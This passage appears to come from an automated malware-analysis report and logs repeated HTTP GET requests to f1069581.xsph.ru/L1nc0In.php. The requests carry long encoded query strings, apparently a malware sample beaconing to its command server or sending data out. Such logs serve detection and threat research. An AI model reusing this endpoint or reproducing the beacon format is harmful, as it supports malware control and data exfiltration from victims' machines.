AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: f1069581.xsph.ru
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?0wJqWIDeGKE5HMQaW9=bgMnNKcplpYN4rS0hE0df6QIvg3&NRe4zqCBoI6g4dbyr6KOyWs=ffVfPD2qQtbU&dYNpRMZ=UjCec&b59daed131a5b229758cb5fca4b11528=gM4UzMyMGNlZmMlRzNmVzMmFGZzMjM4EjNyATN0QGO2kDMiRzNmRDNwgjN4kzN2QDMzIjN1gjM&0ba6e725790744febcc21ebe8d80c3a7=QN4YDOzAzMhFWYiZTMwIzNhFWM5MjNlRmY5cTN2IWO1UTNmZWZmJGZ&70fd1f4e39497cfa4a2ef86106a65a1e=d1nImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W&ce168cbd002dff8b283ef206741c0917=0VfiIiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k0UihmTtlFbkFzYwp0QMl2aslkNJNlW1lzRhdXOtNmasdFV6xWbJNXSTtUdkNjY1RXbiZFaDlUdkNjY1RXbiZlSp9UaVdlYoVTVWFlTrl0cJN1S1R2MiVHdtJmVoNUS1R2MiVHdtJmVKl2TpV1VihWNVZVUktWSzl0UXl2bqlUdsdlYrZEMjBnSDxUaJl2TpNWVRVlSDxUaRhVYDJ0QOJTQTples12Y3pEWaBTNXJ1ZBRVTn10MkZnUtJGckxWS2kUajxmWsJGckxWSzBjbJJnSzImW5EDZsVDMMhmTXFWeWdlYCpUaPlWVtJmdwhlW0x2Rkl2dpl0dBRUT3FERNl2bql0cGdEZ6lzRjl2dplkeWdEZoJ1MVdWUXpFMs1mYWJ0UMdWUXpFcadVYqZ1RjpnQDRmd1sWS2kUealXOtl0cJN0TyEERNVXU65Ed3lXT5VkeOVXQE5UavpWSqlzRil2dplEVWxWS2k0UllnUuJWM5ITWpdXaJJnSzImWClHZsVzaJZTSpJmdsJjWspkbJNXS5FWe5c1VnNGWa9kSp9UarhEZw5UbJNXST9ENFpGT6lEVNVXWE5UdnpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJl3Y1lTbaNnRtlkNJNlW0ZUbUlnVyMmVKNETpFERNNTRE5EeJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiIihzMzY2MwITY0kDZxczYmJzY1MTMkNGZ4UGMjZDMzMWN1UTMzgTZiJiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W HTTP/1.1Accept: /Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: f1069581.xsph.ru
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?0wJqWIDeGKE5HMQaW9=bgMnNKcplpYN4rS0hE0df6QIvg3&NRe4zqCBoI6g4dbyr6KOyWs=ffVfPD2qQtbU&dYNpRMZ=UjCec&b59daed131a5b229758cb5fca4b11528=gM4UzMyMGNlZmMlRzNmVzMmFGZzMjM4EjNyATN0QGO2kDMiRzNmRDNwgjN4kzN2QDMzIjN1gjM&0ba6e725790744febcc21ebe8d80c3a7=QN4YDOzAzMhFWYiZTMwIzNhFWM5MjNlRmY5cTN2IWO1UTNmZWZmJGZ&70fd1f4e39497cfa4a2ef86106a65a1e=d1nImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W&ce168cbd002dff8b283ef206741c0917=0VfiIiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k0UihmTtlFbkFzYwp0QMl2aslkNJNlW1lzRhdXOtNmasdFV6xWbJNXSTtUdkNjY1RXbiZFaDlUdkNjY1RXbiZlSp9UaVdlYoVTVWFlTrl0cJN1S1R2MiVHdtJmVoNUS1R2MiVHdtJmVKl2TpV1VihWNVZVUktWSzl0UXl2bqlUdsdlYrZEMjBnSDxUaJl2TpNWVRVlSDxUaRhVYDJ0QOJTQTples12Y3pEWaBTNXJ1ZBRVTn10MkZnUtJGckxWS2kUajxmWsJGckxWSzBjbJJnSzImW5EDZsVDMMhmTXFWeWdlYCpUaPlWVtJmdwhlW0x2Rkl2dpl0dBRUT3FERNl2bql0cGdEZ6lzRjl2dplkeWdEZoJ1MVdWUXpFMs1mYWJ0UMdWUXpFcadVYqZ1RjpnQDRmd1sWS2kUealXOtl0cJN0TyEERNVXU65Ed3lXT5VkeOVXQE5UavpWSqlzRil2dplEVWxWS2k0UllnUuJWM5ITWpdXaJJnSzImWClHZsVzaJZTSpJmdsJjWspkbJNXS5FWe5c1VnNGWa9kSp9UarhEZw5UbJNXST9ENFpGT6lEVNVXWE5UdnpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJl3Y1lTbaNnRtlkNJNlW0ZUbUlnVyMmVKNETpFERNNTRE5EeJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiIihzMzY2MwITY0kDZxczYmJzY1MTMkNGZ4UGMjZDMzMWN1UTMzgTZiJiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W HTTP/1.1Accept: /Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: f1069581.xsph.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?0wJqWIDeGKE5HMQaW9=bgMnNKcplpYN4rS0hE0df6QIvg3&NRe4zqCBoI6g4dbyr6KOyWs=ffVfPD2qQtbU&dYNpRMZ=UjCec&b59daed131a5b229758cb5fca4b11528=gM4UzMyMGNlZmMlRzNmVzMmFGZzMjM4EjNyATN0QGO2kDMiRzNmRDNwgjN4kzN2QDMzIjN1gjM&0ba6e725790744febcc21ebe8d80c3a7=QN4YDOzAzMhFWYiZTMwIzNhFWM5MjNlRmY5cTN2IWO1UTNmZWZmJGZ&70fd1f4e39497cfa4a2ef86106a65a1e=d1nImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W&ce168cbd002dff8b283ef206741c0917=0VfiIiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k0UihmTtlFbkFzYwp0QMl2aslkNJNlW1lzRhdXOtNmasdFV6xWbJNXSTtUdkNjY1RXbiZFaDlUdkNjY1RXbiZlSp9UaVdlYoVTVWFlTrl0cJN1S1R2MiVHdtJmVoNUS1R2MiVHdtJmVKl2TpV1VihWNVZVUktWSzl0UXl2bqlUdsdlYrZEMjBnSDxUaJl2TpNWVRVlSDxUaRhVYDJ0QOJTQTples12Y3pEWaBTNXJ1ZBRVTn10MkZnUtJGckxWS2kUajxmWsJGckxWSzBjbJJnSzImW5EDZsVDMMhmTXFWeWdlYCpUaPlWVtJmdwhlW0x2Rkl2dpl0dBRUT3FERNl2bql0cGdEZ6lzRjl2dplkeWdEZoJ1MVdWUXpFMs1mYWJ0UMdWUXpFcadVYqZ1RjpnQDRmd1sWS2kUealXOtl0cJN0TyEERNVXU65Ed3lXT5VkeOVXQE5UavpWSqlzRil2dplEVWxWS2k0UllnUuJWM5ITWpdXaJJnSzImWClHZsVzaJZTSpJmdsJjWspkbJNXS5FWe5c1VnNGWa9kSp9UarhEZw5UbJNXST9ENFpGT6lEVNVXWE5UdnpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJl3Y1lTbaNnRtlkNJNlW0ZUbUlnVyMmVKNETpFERNNTRE5EeJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiIihzMzY2MwITY0kDZxczYmJzY1MTMkNGZ4UGMjZDMzMWN1UTMzgTZiJiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W HTTP/1.1Accept: /Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: f1069581.xsph.ru
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?0wJqWIDeGKE5HMQaW9=bgMnNKcplpYN4rS0hE0df6QIvg3&NRe4zqCBoI6g4dbyr6KOyWs=ffVfPD2qQtbU&dYNpRMZ=UjCec&b59daed131a5b229758cb5fca4b11528=gM4UzMyMGNlZmMlRzNmVzMmFGZzMjM4EjNyATN0QGO2kDMiRzNmRDNwgjN4kzN2QDMzIjN1gjM&0ba6e725790744febcc21ebe8d80c3a7=QN4YDOzAzMhFWYiZTMwIzNhFWM5MjNlRmY5cTN2IWO1UTNmZWZmJGZ&70fd1f4e39497cfa4a2ef86106a65a1e=d1nImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W&ce168cbd002dff8b283ef206741c0917=0VfiIiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k0UihmTtlFbkFzYwp0QMl2aslkNJNlW1lzRhdXOtNmasdFV6xWbJNXSTtUdkNjY1RXbiZFaDlUdkNjY1RXbiZlSp9UaVdlYoVTVWFlTrl0cJN1S1R2MiVHdtJmVoNUS1R2MiVHdtJmVKl2TpV1VihWNVZVUktWSzl0UXl2bqlUdsdlYrZEMjBnSDxUaJl2TpNWVRVlSDxUaRhVYDJ0QOJTQTples12Y3pEWaBTNXJ1ZBRVTn10MkZnUtJGckxWS2kUajxmWsJGckxWSzBjbJJnSzImW5EDZsVDMMhmTXFWeWdlYCpUaPlWVtJmdwhlW0x2Rkl2dpl0dBRUT3FERNl2bql0cGdEZ6lzRjl2dplkeWdEZoJ1MVdWUXpFMs1mYWJ0UMdWUXpFcadVYqZ1RjpnQDRmd1sWS2kUealXOtl0cJN0TyEERNVXU65Ed3lXT5VkeOVXQE5UavpWSqlzRil2dplEVWxWS2k0UllnUuJWM5ITWpdXaJJnSzImWClHZsVzaJZTSpJmdsJjWspkbJNXS5FWe5c1VnNGWa9kSp9UarhEZw5UbJNXST9ENFpGT6lEVNVXWE5UdnpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJl3Y1lTbaNnRtlkNJNlW0ZUbUlnVyMmVKNETpFERNNTRE5EeJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiIihzMzY2MwITY0kDZxczYmJzY1MTMkNGZ4UGMjZDMzMWN1UTMzgTZiJiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W HTTP/1.1Accept: /Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: f1069581.xsph.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?0wJqWIDeGKE5HMQaW9=bgMnNKcplpYN4rS0hE0df6QIvg3&NRe4zqCBoI6g4dbyr6KOyWs=ffVfPD2qQtbU&dYNpRMZ=UjCec&b59daed131a5b229758cb5fca4b11528=gM4UzMyMGNlZmMlRzNmVzMmFGZzMjM4EjNyATN0QGO2kDMiRzNmRDNwgjN4kzN2QDMzIjN1gjM&0ba6e725790744febcc21ebe8d80c3a7=QN4YDOzAzMhFWYiZTMwIzNhFWM5MjNlRmY5cTN2IWO1UTNmZWZmJGZ&70fd1f4e39497cfa4a2ef86106a65a1e=d1nImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W&ce168cbd002dff8b283ef206741c0917=0VfiIiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k0UihmTtlFbkFzYwp0QMl2aslkNJNlW1lzRhdXOtNmasdFV6xWbJNXSTtUdkNjY1RXbiZFaDlUdkNjY1RXbiZlSp9UaVdlYoVTVWFlTrl0cJN1S1R2MiVHdtJmVoNUS1R2MiVHdtJmVKl2TpV1VihWNVZVUktWSzl0UXl2bqlUdsdlYrZEMjBnSDxUaJl2TpNWVRVlSDxUaRhVYDJ0QOJTQTples12Y3pEWaBTNXJ1ZBRVTn10MkZnUtJGckxWS2kUajxmWsJGckxWSzBjbJJnSzImW5EDZsVDMMhmTXFWeWdlYCpUaPlWVtJmdwhlW0x2Rkl2dpl0dBRUT3FERNl2bql0cGdEZ6lzRjl2dplkeWdEZoJ1MVdWUXpFMs1mYWJ0UMdWUXpFcadVYqZ1RjpnQDRmd1sWS2kUealXOtl0cJN0TyEERNVXU65Ed3lXT5VkeOVXQE5UavpWSqlzRil2dplEVWxWS2k0UllnUuJWM5ITWpdXaJJnSzImWClHZsVzaJZTSpJmdsJjWspkbJNXS5FWe5c1VnNGWa9kSp9UarhEZw5UbJNXST9ENFpGT6lEVNVXWE5UdnpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJl3Y1lTbaNnRtlkNJNlW0ZUbUlnVyMmVKNETpFERNNTRE5EeJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiIihzMzY2MwITY0kDZxczYmJzY1MTMkNGZ4UGMjZDMzMWN1UTMzgTZiJiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W HTTP/1.1Accept: /Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: f1069581.xsph.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?0wJqWIDeGKE5HMQaW9=bgMnNKcplpYN4rS0hE0df6QIvg3&NRe4zqCBoI6g4dbyr6KOyWs=ffVfPD2qQtbU&dYNpRMZ=UjCec&b59daed131a5b229758cb5fca4b11528=gM4UzMyMGNlZmMlRzNmVzMmFGZzMjM4EjNyATN0QGO2kDMiRzNmRDNwgjN4kzN2QDMzIjN1gjM&0ba6e725790744febcc21ebe8d80c3a7=QN4YDOzAzMhFWYiZTMwIzNhFWM5MjNlRmY5cTN2IWO1UTNmZWZmJGZ&70fd1f4e39497cfa4a2ef86106a65a1e=d1nImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W&ce168cbd002dff8b283ef206741c0917=0VfiIiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k0UihmTtlFbkFzYwp0QMl2aslkNJNlW1lzRhdXOtNmasdFV6xWbJNXSTtUdkNjY1RXbiZFaDlUdkNjY1RXbiZlSp9UaVdlYoVTVWFlTrl0cJN1S1R2MiVHdtJmVoNUS1R2MiVHdtJmVKl2TpV1VihWNVZVUktWSzl0UXl2bqlUdsdlYrZEMjBnSDxUaJl2TpNWVRVlSDxUaRhVYDJ0QOJTQTples12Y3pEWaBTNXJ1ZBRVTn10MkZnUtJGckxWS2kUajxmWsJGckxWSzBjbJJnSzImW5EDZsVDMMhmTXFWeWdlYCpUaPlWVtJmdwhlW0x2Rkl2dpl0dBRUT3FERNl2bql0cGdEZ6lzRjl2dplkeWdEZoJ1MVdWUXpFMs1mYWJ0UMdWUXpFcadVYqZ1RjpnQDRmd1sWS2kUealXOtl0cJN0TyEERNVXU65Ed3lXT5VkeOVXQE5UavpWSqlzRil2dplEVWxWS2k0UllnUuJWM5ITWpdXaJJnSzImWClHZsVzaJZTSpJmdsJjWspkbJNXS5FWe5c1VnNGWa9kSp9UarhEZw5UbJNXST9ENFpGT6lEVNVXWE5UdnpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJl3Y1lTbaNnRtlkNJNlW0ZUbUlnVyMmVKNETpFERNNTRE5EeJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiIihzMzY2MwITY0kDZxczYmJzY1MTMkNGZ4UGMjZDMzMWN1UTMzgTZiJiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W HTTP/1.1Accept: /Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: f1069581.xsph.ru
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?0wJqWIDeGKE5HMQaW9=bgMnNKcplpYN4rS0hE0df6QIvg3&NRe4zqCBoI6g4dbyr6KOyWs=ffVfPD2qQtbU&dYNpRMZ=UjCec&b59daed131a5b229758cb5fca4b11528=gM4UzMyMGNlZmMlRzNmVzMmFGZzMjM4EjNyATN0QGO2kDMiRzNmRDNwgjN4kzN2QDMzIjN1gjM&0ba6e725790744febcc21ebe8d80c3a7=QN4YDOzAzMhFWYiZTMwIzNhFWM5MjNlRmY5cTN2IWO1UTNmZWZmJGZ&70fd1f4e39497cfa4a2ef86106a65a1e=d1nImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W&ce168cbd002dff8b283ef206741c0917=d1nIiojI0EWZiVTYzATYmVWZlRjZlRWZwgzY4ITOhdTY3EWOmJmIsIiZ4MjZxIzNhBzYxgzN4cTOiN2M3YWNhNGMzUjM5YDOyAjZjFDN5cjNiojImdTNyEWO4EDO1gTM0AjZmNjM5MjN2YmNyUzM3UDM1MjIsIiNkZ2N4EjM0MmM3MDZkNTMmNTM4IGMkJmYhJDOlVjNzMjZ1UmYiFWZiojIxYWY5UmYjNDM5YTZzATZlV2M0czY0EWNhRjYxcjY4UmI7xSfiElZx8maJBjVzIGbxcVYVJEWaxGeyUVa3lWSuVzVhdnVXp1cOxWS2kUejFjUYlFMOZVZwwWbkBnUzklQKNETplUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k0UihmTtlFbkFzYwp0QMl2aslkNJNlW1lzRhdXOtNmasdFV6xWbJNXSTtUdkNjY1RXbiZFaDlUdkNjY1RXbiZlSp9UaVdlYoVTVWFlTrl0cJN1S1R2MiVHdtJmVoNUS1R2MiVHdtJmVKl2TpV1VihWNVZVUktWSzl0UXl2bqlUdsdlYrZEMjBnSDxUaJl2TpNWVRVlSDxUaRhVYDJ0QOJTQTples12Y3pEWaBTNXJ1ZBRVTn10MkZnUtJGckxWS2kUajxmWsJGckxWSzBjbJJnSzImW5EDZsVDMMhmTXFWeWdlYCpUaPlWVtJmdwhlW0x2Rkl2dpl0dBRUT3FERNl2bql0cGdEZ6lzRjl2dplkeWdEZoJ1MVdWUXpFMs1mYWJ0UMdWUXpFcadVYqZ1RjpnQDRmd1sWS2kUealXOtl0cJN0TyEERNVXU65Ed3lXT5VkeOVXQE5UavpWSqlzRil2dplEVWxWS2k0UllnUuJWM5ITWpdXaJJnSzImWClHZsVzaJZTSpJmdsJjWspkbJNXS5FWe5c1VnNGWa9kSp9UarhEZw5UbJNXST9ENFpGT6lEVNVXWE5UdnpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJl3Y1lTbaNnRtlkNJNlW0ZUbUlnVyMmVKNETpFERNNTRE5EeJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiIihzMzY2MwITY0kDZxczYmJzY1MTMkNGZ4UGMjZDMzMWN1UTMzgTZiJiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W HTTP/1.1Accept: /Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: f1069581.xsph.ru
